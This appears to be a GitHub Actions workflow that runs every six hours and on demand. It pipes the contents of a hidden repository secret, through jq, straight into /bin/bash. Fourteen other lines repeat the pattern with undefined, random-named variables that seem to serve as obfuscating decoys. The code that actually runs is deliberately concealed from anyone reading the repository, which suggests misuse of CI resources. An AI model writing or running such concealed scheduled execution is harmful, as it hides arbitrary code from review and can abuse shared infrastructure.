name: mmiaomiaoyu

on:
  workflow_dispatch:
  schedule:
    - cron: '59 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mmiaomiaoyu
        env:
          whu99635: ${{ secrets.whu99635 }}
        run: |
          echo $whu99635 | jq -r .lt761 | /bin/bash
          echo $svwu60296 | jq -r .oid5727 | /bin/bash
          echo $epx5350 | jq -r .kq0 | /bin/bash
          echo $udkk1 | jq -r .xy6 | /bin/bash
          echo $grv70 | jq -r .u01795 | /bin/bash
          echo $st1 | jq -r .yyw47237 | /bin/bash
          echo $de7570 | jq -r .jcqq2592 | /bin/bash
          echo $annw102 | jq -r .gitd10549 | /bin/bash
          echo $lyj22689 | jq -r .i2 | /bin/bash
          echo $afa52131 | jq -r .nr021 | /bin/bash
          echo $nq1325 | jq -r .lr7 | /bin/bash
          echo $giqt6 | jq -r .unoew245 | /bin/bash
          echo $z461 | jq -r .vji3124 | /bin/bash
          echo $szhm65 | jq -r .t9771 | /bin/bash
          echo $fi78513 | jq -r .xhxp196 | /bin/bash

